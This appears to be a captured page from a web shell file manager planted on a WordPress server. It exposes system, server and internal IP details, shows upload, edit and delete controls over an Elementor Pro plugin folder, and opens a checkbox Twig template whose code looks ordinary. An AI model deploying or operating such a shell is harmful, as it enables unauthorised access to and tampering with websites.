[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
elementor-pro
/
modules
/
atomic-form
/
checkbox
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 checkbox.html.twig
1,217 B
SET
[ EDIT ]
|
[ DEL ]
📄 checkbox.php
3,569 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: checkbox.html.twig
{% set classes = settings.classes | merge( [ base_styles.base ] ) | join(' ') | trim %} {% set id_attribute = settings._cssid is not empty ? 'id=' ~ settings._cssid | e('html_attr') : '' %} {% set interactions_attribute = interactions is not empty ? 'data-interactions=' ~ interactions | json_encode | e('html_attr') : '' %} {% set placeholder_attribute = settings.placeholder is not empty ? 'placeholder=' ~ settings.placeholder | e('html_attr') : '' %} {% set required_attribute = settings.required ? 'required' : '' %} {% set checked_attribute = settings.checked ? 'checked' : '' %} {% set name = settings.name is not empty ? settings.name : settings._cssid is not empty ? 'checkbox_' ~ settings._cssid : 'checkbox_' ~ id %} {% set name_attribute = 'name=' ~ name | e('html_attr') %} {% set value_attribute = settings.value is not empty ? 'value=' ~ settings.value | e('html_attr') : '' %} <input {{ id_attribute }} {{ name_attribute }} {{ value_attribute }} class="{{ classes }}" type="checkbox" data-interaction-id="{{ interaction_id | default(id) }}" {{ settings.attributes | raw }} {{ interactions_attribute }} {{ placeholder_attribute | raw }} {{ required_attribute }} {{ checked_attribute }} />